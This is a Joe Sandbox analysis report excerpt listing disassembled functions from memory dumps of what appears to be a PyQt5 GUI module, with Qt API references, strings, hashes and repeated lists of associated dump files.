Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Writing$?supportedDatabase@@@@FontFont@@List@System@Systems@malloc
String ID: QRawFont$supportedWritingSystems$supportedWritingSystems(self) -> List[QFontDatabase.WritingSystem]
API String ID: 1806276047-1102475657
Opcode ID: 8f3a525a582965fcf6484d76d7cf6a81449d8125b6e4e0373f0169e7182a4920
Instruction ID: 6c54cedd9359c338abf75c4e6ffc2442b68fe9d687909b8b457bd7670f7278a4
Opcode Fuzzy Hash: 8f3a525a582965fcf6484d76d7cf6a81449d8125b6e4e0373f0169e7182a4920
Instruction Fuzzy Hash: 79111BB5B18B4681EB10DF75E8586A937A8FB95B84FA180B6CD4D07320CF7DD549C740

Function 00007FFB9A2ED920 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?allFormats@QTextDocument@@QEBA?AV?$QVector@VQTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A2ED978

Strings

allFormats, xrefs: 00007FFB9A2ED9B0
allFormats(self) -> List[QTextFormat], xrefs: 00007FFB9A2ED9A4
QTextDocument, xrefs: 00007FFB9A2ED9B7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?allDocument@@Format@@@@Formats@Vector@malloc
String ID: QTextDocument$allFormats$allFormats(self) -> List[QTextFormat]
API String ID: 1543669490-2229282000
Opcode ID: 600731a6581c9f6395082d5c0ad6a393f3f22c8132f2c5fb468e2748b146cb12
Instruction ID: b043c009e72e128f22fee7fa688b3c429db7b4884b0f10f7c9bbd40096d09daf
Opcode Fuzzy Hash: 600731a6581c9f6395082d5c0ad6a393f3f22c8132f2c5fb468e2748b146cb12
Instruction Fuzzy Hash: 39111BB5B08B4681EB10DF75E8986A937A8FB55B84FA180B6CE4D03320DF7DE949C740

Function 00007FFB9A311920 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?pageBreakPolicy@QTextBlockFormat@@QEBA?AV?$QFlags@W4PageBreakFlag@QTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A311978

Strings

QTextFrameFormat, xrefs: 00007FFB9A3119B7
pageBreakPolicy, xrefs: 00007FFB9A3119B0
pageBreakPolicy(self) -> QTextFormat.PageBreakFlags, xrefs: 00007FFB9A3119A4

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: BreakText$?pageBlockFlag@Flags@Format@@Format@@@@PagePolicy@malloc
String ID: QTextFrameFormat$pageBreakPolicy$pageBreakPolicy(self) -> QTextFormat.PageBreakFlags
API String ID: 4265840606-525151680
Opcode ID: b8ddc5e155245d2593f6f06130f50f17be098139b34002834aabde2105e7c6e6
Instruction ID: 22609e6ca9732905d7d5836f35bdec3bb81b60670cfde21bf5b57986350ff875
Opcode Fuzzy Hash: b8ddc5e155245d2593f6f06130f50f17be098139b34002834aabde2105e7c6e6
Instruction Fuzzy Hash: 281109B5B08A4A81EB109F75E8486A937A8FB55B84FA180B6CE5C43320DF7DD549C740

Function 00007FFB9A307990 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?availableSize@QScreen@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FFB9A3079E8

Strings

QScreen, xrefs: 00007FFB9A307A27
availableSize, xrefs: 00007FFB9A307A20
availableSize(self) -> QSize, xrefs: 00007FFB9A307A14

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?availableScreen@@Size@Size@@malloc
String ID: QScreen$availableSize$availableSize(self) -> QSize
API String ID: 1053042026-1315219721
Opcode ID: 7c585ea7f9efd6f36537a189a62de1dbd8afd4c73795f70f61b3db991dae5c55
Instruction ID: ff346ab28f8c194fb95e5a5cbf8bbf24d009067efa46b034a012de31678a5739
Opcode Fuzzy Hash: 7c585ea7f9efd6f36537a189a62de1dbd8afd4c73795f70f61b3db991dae5c55
Instruction Fuzzy Hash: 6E111BB5B08A96C1EB10DF75E8586A933A8FB95B84FA140B6CD4D03320CF7DD549C740

Function 00007FFB9A341930 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?textFormats@QTextBlock@@QEBA?AV?$QVector@UFormatRange@QTextLayout@@@@XZ.QT5GUI ref: 00007FFB9A341988

Strings

textFormats, xrefs: 00007FFB9A3419C0
textFormats(self) -> List[QTextLayout.FormatRange], xrefs: 00007FFB9A3419B4
QTextBlock, xrefs: 00007FFB9A3419C7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?textBlock@@FormatFormats@Layout@@@@Range@Vector@malloc
String ID: QTextBlock$textFormats$textFormats(self) -> List[QTextLayout.FormatRange]
API String ID: 2459372140-882490682
Opcode ID: f79ca7cf93497acdb25f7d2cdb24a3b753fb5bc26d950d45fc4d5a315d5c3835
Instruction ID: 5dcbc2bdd6001a1782d50356812dcf8c1c1efd5bb1cff652d8db1e78abc1bec9
Opcode Fuzzy Hash: f79ca7cf93497acdb25f7d2cdb24a3b753fb5bc26d950d45fc4d5a315d5c3835
Instruction Fuzzy Hash: D6115BB5B18B4681EB10CF75E8486A937A8FB95B88FA180B6CD4C03320DF7CD549C380

Function 00007FFB9A2EB960 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?defaultFont@QTextDocument@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FFB9A2EB9B8

Strings

defaultFont, xrefs: 00007FFB9A2EB9F0
QTextDocument, xrefs: 00007FFB9A2EB9F7
defaultFont(self) -> QFont, xrefs: 00007FFB9A2EB9E4

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?defaultDocument@@Font@Font@@Textmalloc
String ID: QTextDocument$defaultFont$defaultFont(self) -> QFont
API String ID: 2933974531-580531534
Opcode ID: ae45e567e2619f1e407fceedbee1129f9c88d3354b5415c03124cbb39b2ea2fc
Instruction ID: 0fda678dad3bad24e6af14270856bb507fafece00d74f60de1916ed4f1a5a95e
Opcode Fuzzy Hash: ae45e567e2619f1e407fceedbee1129f9c88d3354b5415c03124cbb39b2ea2fc
Instruction Fuzzy Hash: 72111EB5B09A4681EB20DF75E8586A937A8FF55B84FA180B6CD4D03320CF7DD549C740

Function 00007FFB9A30D9F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?manufacturer@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A30DA48

Strings

QScreen, xrefs: 00007FFB9A30DA87
manufacturer(self) -> str, xrefs: 00007FFB9A30DA74
manufacturer, xrefs: 00007FFB9A30DA80

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?manufacturer@Screen@@String@@malloc
String ID: QScreen$manufacturer$manufacturer(self) -> str
API String ID: 3036166716-2931227326
Opcode ID: 7257908f5dc9e15f6ee32110725d948e4614b3f2fad6f9d5b3bf0e1cd19a533a
Instruction ID: c98f9c4ee52c2c24ce0cb4635e4ae9f15f477a3d1bc43a7908bff6bd8149b744
Opcode Fuzzy Hash: 7257908f5dc9e15f6ee32110725d948e4614b3f2fad6f9d5b3bf0e1cd19a533a
Instruction Fuzzy Hash: 221135B5B08A56C1EB60DF75E8486A933A8FB95B84FA180B6CE0C03320CF7CD589C340

Function 00007FFB9A339A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?window@QPainter@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFB9A339A68

Strings

window, xrefs: 00007FFB9A339AA0
QPainter, xrefs: 00007FFB9A339AA7
window(self) -> QRect, xrefs: 00007FFB9A339A94

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?window@Painter@@Rect@@malloc
String ID: QPainter$window$window(self) -> QRect
API String ID: 83040069-2596992568
Opcode ID: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
Instruction ID: 2bc937dd9499ea94be2abcbb10333fdb557ad6ee08204dc86f836d36613a63af
Opcode Fuzzy Hash: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
Instruction Fuzzy Hash: C11139B6B18A86C1EB10DF35E8586A933A8FB85B94FA140B6CE4D03320CF7CE549C340

Function 00007FFB9A3139F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFB9A313A4F

Strings

alpha8(self) -> int, xrefs: 00007FFB9A313A61
alpha8, xrefs: 00007FFB9A313A6D
QRgba64, xrefs: 00007FFB9A313A74

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QRgba64$alpha8$alpha8(self) -> int
API String ID: 3417993445-961599035
Opcode ID: aac0bc655afed459fb16aeea36ec343fdf84825c6be5f24e33ac063a2613fd69
Instruction ID: 86ca9e5394f58a1750ab7332871aa6078cce5d69ec2dea520cf20f35bb50d5ef
Opcode Fuzzy Hash: aac0bc655afed459fb16aeea36ec343fdf84825c6be5f24e33ac063a2613fd69
Instruction Fuzzy Hash: 03018C72B08A86C1EB108F74D8582B937A8FB40B45F9141B6DE5D43360CF7CD59AC380

Function 00007FFB9A30FF00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setWidthF@QPen@@QEAAXN@Z.QT5GUI ref: 00007FFB9A30FF59

Strings

QPen, xrefs: 00007FFB9A30FF8F
setWidthF(self, width: float), xrefs: 00007FFB9A30FF7C
setWidthF, xrefs: 00007FFB9A30FF88

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
